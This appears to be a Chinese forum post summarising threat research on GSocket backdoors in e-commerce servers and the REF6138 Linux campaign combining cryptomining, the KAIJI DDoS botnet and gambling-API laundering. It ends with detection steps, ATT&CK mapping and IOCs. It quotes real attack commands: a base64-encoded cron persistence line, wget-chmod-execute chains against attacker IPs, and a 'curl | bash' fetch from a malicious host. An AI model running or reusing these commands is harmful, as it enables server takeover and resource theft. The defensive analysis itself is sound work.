​qfile​
[/list
这些文件绝非普通数据——它们实际上是 ​GSocket 后门的连接密钥​。一旦攻击者获取这些密钥,就能立即通过 GSocket 建立​反向 Shell(Reverse Shell)​,完全接管你的服务器,而你却毫无察觉。
为验证问题的严重性,我们对 8 万个电商网站进行了快速扫描,结果令人震惊:45 个站点已确认运行着活跃的 GSocket 后门。我们联系了其中一家商户,对方证实其服务器确实已被入侵。
​
2.打地鼠”式感染:清了又来,来了又清
更令人担忧的是,我们的日常爬虫数据显示:​绝大多数被 GSocket 感染的商店,此前已遭受过其他类型的恶意软件攻击​(如 ICONV 漏洞利用、TrojanOrder 订单木马等)。
许多商户尝试自行清理,但由于 GSocket 隐藏得极其巧妙(例如藏在 cron 或内存中),根本未能清除感染根源。在某些案例中,同一网站在短时间内被同一或不同攻击者反复感染多达 7 次——系统管理员恐怕已经焦头烂额。
特别提醒:此攻击对 Adobe Commerce Cloud(原 Magento Cloud) 尤其有效。虽然该平台将代码文件设为“只读”以提升安全性,但 GSocket 可直接从内存文件描述符运行,完全绕过这一保护机制。3.技术细节:GSocket 是如何隐藏自己的?
典型的 GSocket 后门会通过 cron 实现持久化。例如,以下是一条真实的定时任务记录:
[AppleScript] 纯文本查看 复制代码
$ crontab -l
# DO NOT REMOVE THIS LINE. SEED PRNG. #defunct-kernel
0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUzMyBkZWZ1bmN0IDI+L2Rldi9udWxsIHx8IFNIRUxMPSBURVJNPXh0ZXJtLTI1NmNvbG9yIEdTX0FSR1M9Ii1rIC92YXIvd3d3L3B1Yi9kZWZ1bmN0LmRhdCAtbGlxRCIgL3Vzci9iaW4vYmFzaCAtYyAiZXhlYyAtYSAnW21tX3BlcmNwdV93cV0nICcvdmFyL3d3dy9wdWIvZGVmdW5jdCciIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng defunct-kernel
[AppleScript] 纯文本查看 复制代码
/usr/bin/pkill -0 -U33 defunct 2>/dev/null ||
SHELL= TERM=xterm-256color GS_ARGS="-k /var/www/pub/defunct.dat -liqD" /usr/bin/bash -c "exec -a '[mm_percpu_wq]' '/var/www/pub/defunct'" 2>/dev/null
- 检查名为 defunct​ 的进程是否已在运行(用户 ID 为 33,通常是 www-data​)。
- 若未运行,则使用 defunct.dat​ 中的密钥启动 GSocket。
- 将进程名伪装成 [mm_percpu_wq]​ ——这是 Linux 内核的一个真实进程名,极具迷惑性。
在进程列表中,它看起来完全合法:
[AppleScript] 纯文本查看 复制代码
www-data 12393 0.0 0.0 3160 4 ? Ss Feb02 0:00 [mm_percpu_wq]
与我们此前报告的 GSocket 攻击相比,本次事件揭示了两个关键趋势:
- ​黑客之间也在“抢地盘”​:不同犯罪团伙正主动扫描互联网,寻找他人留下的 defunct.dat​ 密钥,试图接管已被入侵的服务器。
- 商户难以彻底清除后门:由于 GSocket 隐藏极深,普通清理手段往往治标不治本,导致反复感染。
5.注意
发现 defunct.dat 不是小事——它意味着你的服务器很可能已被完全控制。GSocket 只是冰山一角,背后往往是更复杂的供应链攻击或平台漏洞利用。
不要只删除文件! 必须溯源初始入侵点(如漏洞、弱密码、恶意插件),并彻底清除所有持久化后门。在电商安全领域,“看不见的威胁”才是最危险的。建议立即使用专业工具进行全面扫描,并部署主动防御体系,才能真正守住你的数字资产。
(三)一场融合挖矿、DDoS 与洗钱的复合型攻击
资料来源:https://www.elastic.co/security-labs/betting-on-bots
发布日期:2024年9月27日
备注:一下内容非全文只是提取主要内容,详情内容请看原文
2024 年 3 月,Elastic 安全实验室发现一起高度复杂的 Linux 服务器攻击活动(代号 REF6138)。攻击者利用 Apache2 Web 服务器漏洞入侵目标,随后部署了一套“组合拳”式恶意工具链:
Kaiji:用于发起 DDoS 攻击RUDEDEVIL:用于窃取算力挖矿(主要挖 Monero/XMR 和 Bitcoin)GSocket:用于建立隐蔽的远程控制通道自定义脚本:通过自动化程序对接在线赌博平台 API,疑似用于洗钱
更令人警惕的是,我们发现攻击者正在通过赌博平台将挖矿所得“变现”——这标志着网络犯罪正从单纯的资源窃取,向金融化、产业化演进。
1.攻击流程全景图
(1)第一步:初始入侵
攻击始于一个未修补的 Apache2 漏洞。攻击者通过 Web 服务器获得任意代码执行权限,并以 www-data 用户身份运行 id 命令确认权限,随即部署 KAIJI 恶意软件。
紧接着,攻击者从 http://61.160.194[.]160:35130 下载名为 00.sh 的加载器脚本(stager),该脚本执行以下操作:
清理系统日志(如 /var/log/ 下的访问记录)终止其他挖矿进程(避免“同行竞争”)清空并重写 iptables 防火墙规则,屏蔽其他矿池连接,确保算力独占下载第二阶段载荷 sss6(即 RUDEDEVIL)并执行,随后删除自身痕迹小知识:stager 是攻击中的“第一阶段”脚本,通常轻量、隐蔽,负责下载真正的恶意载荷(payload)
下图展示了00.sh简要版本,标注为[...]的行已缩短以提高可读性:
​
文件服务器
攻击者通过后门化的Web服务器进程,使用以下命令下载并执行了恶意软件:
[AppleScript] 纯文本查看 复制代码
sh -c wget [url=http://107.178.101]http://107.178.101[/url][.]245:5488/l64;chmod 777 l64;./l64;rm -r l64;wget [url=http://107.178.101]http://107.178.101[/url][.]245:5488/l86;chmod 777 l86;./l86;rm -r l86
#分步解析
##下载并执行 64 位恶意程序
wget [url=http://107.178.101]http://107.178.101[/url][.]245:5488/l64 # 从恶意服务器下载名为 "l64" 的文件
chmod 777 l64 # 赋予所有用户读/写/执行权限(确保可运行)
./l64 # 执行该文件
rm -r l64 # 删除文件(隐藏痕迹)
##下载并执行 86 位恶意程序
wget [url=http://107.178.101]http://107.178.101[/url][.]245:5488/l86 # 下载名为 "l86" 的文件
chmod 777 l86
./l86
rm -r l86
l86:通常为 32 位 Linux 恶意程序(兼容旧系统或特定架构)。
注:文件名 l64/l86 是攻击者常用的命名习惯(l 可能代表 "Linux",64/86 指架构)。
#补充说明
##为何用 sh -c?
确保命令在 Shell 环境中解析(常见于通过 Web 漏洞、SSH 暴力破解后的命令注入)。
##历史关联
类似载荷曾用于 Mozi 僵尸网络、Hajime 变种,目标多为暴露在公网的弱口令设备
这似乎是一个文件服务器,托管着多种架构的各类恶意软件。该文件服务器采用了Rejetto技术。这些恶意软件带有上传日期和下载计数器。例如,9月10日上传的download.sh文件已被下载3,100次。
​
​
(2)第二步:部署核心恶意软件
RUDEDEVIL / LUCIFER:伪装成“可怜人”的挖矿木马
ss6 被确认为 RUDEDEVIL 家族恶意软件。其代码中嵌有一段“卖惨”留言:
​
原文:[AppleScript] 纯文本查看 复制代码
Hi, man. I\'ve seen several organizations report my Trojan recently,
Please let me go. I want to buy a car. That\'s all. I don\'t want to hurt others.
I can\'t help it. My family is very poor. In China, it\'s hard to buy a suite.
I don\'t have any accommodation. I don\'t want to do anything illegal.
Really, really, interested, you can give me XmR, my address is 42cjpfp1jJ6pxv4cbjxbbrmhp9yuzsxh6v5kevp7xzngklnutnzqvu9bhxsqbemstvdwymnsysietq5vubezyfoq4ft4ptc,
thank yo
翻译:
“嗨,朋友。最近好多机构在报告我的木马……
求你放过我吧,我想买辆车。
我家很穷,在中国连套房都买不起……
如果你真感兴趣,可以给我打点门罗币(XMR)……”
技术特点:
- 使用 XOR 加密 配置信息(如 C2 地址、矿池参数)
- 自动解密后连接 C2 域名 nishabii[.]xyz​
- 下载 ​XMRig​(开源挖矿程序)并配置连接 c3pool.org​ 矿池
- 多线程运行:挖矿、杀进程、监控 CPU/网络、回传主机信息
我们解密出的矿池配置显示,攻击者使用了​多个钱包地址​,包括:
- ​41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9​(Monero)
- ​42cjpfp1jJ6pxv4cbjxbbrmhp9yuzsxh6v5kevp7xzngklnutnzqvu9bhxsqbemstvdwymnsysietq5vubezyfoq4ft4ptc​(Monero,与此前 Sansec 报告中的 defunct.dat​ 关联)
门罗币(Monero, XMR)为何受黑客青睐?
因其交易高度匿名,难以追踪资金流向,是网络犯罪的“首选货币”
KAIJI:老牌 DDoS 僵尸网络卷土重来
攻击者同时部署了 KAIJI(又名 Chaos),一款以 DDoS 能力著称的 Go 语言编写的僵尸网络木马。
在调查发现的文件服务器上的文件时,发现了一个shell脚本。该脚本似乎是早期阶段用于下载的核心文件,确保为受害者使用正确的架构:
​
​
尽管代码与 2022 年样本几乎一致,但 ​C2 服务器地址已更换​,说明攻击者在持续运营基础设施。
KAIJI 的持久化手段极为狡猾:
- 在 /etc/​、/dev/​、/boot/​ 创建隐藏文件(如 /etc/32678​、/boot/System.img.config​)
- 通过 Systemd 服务 和 SysVinit 脚本 双重驻留
- 利用 bind mount 技术隐藏文件
- 甚至​篡改 SELinux 策略​,绕过系统安全限制
(3)第三步:建立隐蔽远程控制通道 —— GSocket
为确保长期控制,攻击者安装了 GSocket。
尽管GSOCKET本身并非恶意程序,但其功能可能被用于可疑目的。
部署后,GSOCKET会执行多项操作以维持持久性并隐藏自身存在。首先,它会扫描系统中的活动内核进程,以确定伪装目标进程:
​
随后创建/dev/shm/.gs-1000目录,用于下载并存储其二进制文件至共享内存。此外,默认情况下会在/home/user/.config/htop/目录下建立/htop目录,用于存储GSOCKET二进制文件及其运行所需的密钥。
接着配置一个cron任务,该任务每分钟运行一次GSOCKET二进制文件,并使用该密钥进行操作。
​
该二进制文件通过 exec -a [进程名] 命令以内核进程身份执行,进一步增强了规避检测的能力。cron 任务包含一条 Base64 编码的命令,解码后可确保持久化机制定期执行并伪装成合法内核进程:
解码有效载荷时可见,密钥defunct.dat被用作执行参数启动defunct二进制文件,该文件通过exec -a命令伪装为[raid5wq]进程:
除定时任务外,GSOCKET还可通过修改shell配置文件、运行控制(rc.local)及Systemd实现持久化。GSOCKET会枚举潜在持久化存储位置:
​
​
GSOCKET支持多种webhook,例如Telegram或Discord集成,实现远程控制和通知功能:
最后,安装完成后,GSOCKET会确保所有创建或修改的文件都被篡改时间戳,试图抹去任何安装痕迹:
​
这些特性使GSOCKET成为寻求隐蔽性和持久性的威胁行为者青睐的工具。在本轮攻击活动中,攻击者利用GSOCKET建立通往C2服务器的隐蔽通道,同时试图规避检测。
此外,攻击者从外部IP地址获取PHP有效载荷并保存为404.php文件,该文件很可能作为未来访问的后门。我们未能获取该有效载荷。
GSocket 的核心能力是:​让位于内网或防火墙后的服务器,也能被外部直接访问​。它通过全球中继网络(GSRN)建立加密隧道,支持 SSH、文件传输、远程命令执行。
在本次攻击中,GSocket 被用来:
- 伪装成内核进程 [mm_percpu_wq]​
- 通过 cron 每分钟自动重启
- 密钥存储在 /var/www/pub/defunct.dat​(与 Sansec 报告完全吻合!)
- 修改 shell 配置文件(如 .bashrc​)实现持久化
关键发现:攻击者之间也在“抢地盘”!
黑客正大规模扫描互联网,寻找他人留下的 defunct.dat 文件,试图接管已被入侵的服务器。和案例2关联上了
(4)第四步:转向赌博 API —— 挖矿收益如何“洗白”?
在持续两周的手动渗透(尝试提权、部署 pspy64​ 监控进程、利用 CVE-2021-4034(PwnKit) 提权失败)后,攻击者调整策略:
他们通过 GSocket 下载一个名为 ifindyou​ 的 Bash 脚本,该脚本会:
- 从 gcp.pagaelrescate[.]com​ 下载 XMRig 挖矿程序(打包为 SystemdXC)
- 配置连接 unmineable.com 矿池(支持将算力兑换为 Bitcoin)
- 使用服务器主机名作为矿工 ID
- 将收益打入 Bitcoin 钱包 1CSUkd5F...​
更关键的是,脚本还执行了:
[AppleScript] 纯文本查看 复制代码
curl -s [url=http://gcp.pagaelrescate]http://gcp.pagaelrescate[/url][.]com:8080/cycnet | bash
该载荷会向 Telegram 机器人 发送主机状态信息。
随后,一个 Python 脚本 enviador_slot 被定时执行(每 4 小时一次),其功能令人震惊:自动化玩在线赌博游戏!
该脚本包含完整的游戏逻辑:
用户登录(obteneruid)下注(hacerjugada)处理开奖结果将输赢结果回传服务器(enviardatos)
虽然目前仅对接测试环境,但其目的显而易见:
将挖矿所得的加密货币,通过赌博平台“洗”成看似合法的资金,再提现至交易所(如 Binance)
证据链:
我们追踪到 Bitcoin 钱包 1CSUkd5F... 的唯一一笔转账,收款方正是币安(Binance)的热钱包
2.攻击者技术手段(MITRE ATT&CK)[td]| 战术 | 技术 | 具体行为 |
| 初始访问 | T1190:利用面向公众的应用漏洞 | Apache2 RCE |
| 执行 | T1059:命令行脚本 | Bash/Python 脚本执行 |
| 持久化 | T1053:计划任务(Cron) | GSocket、KAIJI 定时启动 |
| 防御规避 | T1036:伪装(Masquerading) | 进程名伪装为[mm_percpu_wq]​ |
| 命令控制 | T1071:应用层协议 | Telegram Bot、HTTPS |
| 影响 | T1496:资源劫持 | CPU 挖矿、DDoS |
三、检测并防御 GSocket
(一)检测建议:
立即检查以下路径是否存在可疑文件:[AppleScript] 纯文本查看 复制代码
/pub/defunct.dat
/errors/defunct.dat
/pub/qfile
/defunct.dat
检查 cron 任务:运行 crontab -l 或查看 /etc/cron.d/,寻找包含 defunct、base64 或伪装进程名的条目。
使用专业工具:例如运行 eComscan(Sansec 开发的商业级安全扫描器),可自动识别 GSocket 及其所有持久化机制。
(二)防御建议:
部署专用 WAF:如 Sansec Shield,可有效拦截 ICONV 漏洞、TrojanOrder 等初始攻击入口,从源头阻止 GSocket 植入。及时修补漏洞:近期 Adobe Commerce 的多个高危漏洞(如 CVE-2025-54236 “SessionReaper”)已被用于此类攻击,务必尽快升级。最小权限原则:确保 Web 服务(如 www-data)无法写入关键目录,限制 cron 权限。一体化的主动防御体系:对企业而言,仅靠杀毒软件已远远不够。必须构建“检测-响应-狩猎”一体化的主动防御体系,才能在这场攻防对抗中守住底线
(三)相关威胁情报(IOCs)
1.C2和托管恶意程序的主机:[AppleScript] 纯文本查看 复制代码
45.77.95.4
61.160.194.160
62.72.22.91
107.178.101.245
3.147.53.183
38.54.125.192
91.92.241.103
nishabii.xyz
[url=http://gcp.pagaelrescate.com:8080]http://gcp.pagaelrescate.com:8080[/url]
[url=http://hfs.t1linux.com:7845]http://hfs.t1linux.com:7845[/url]
[AppleScript] 纯文本查看 复制代码
/pub/defunct.dat
/errors/defunct.dat
/pub/qfile
/defunct.dat
/var/www/pub/defunct.dat
/etc/32678
/boot/System.img.config
[AppleScript] 纯文本查看 复制代码
XMR Wallet:41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL
XMR Wallet:42CJPfp1jJ6PXv4cbjXbBRMhp9YUZsXH6V5kEvp7XzNGKLnuTNZQVU9bhxsqBEMstvDwymNSysietQ5VubezYfoq4fT4Ptc
BTC Wallet:1CSUkd5FZMis5NDauKLDkcpvvgV1zrBCBz
IP卡
发表于 
提升卡
置顶卡
变色卡
千斤顶
显身卡
发表于 
发表于 
发表于 
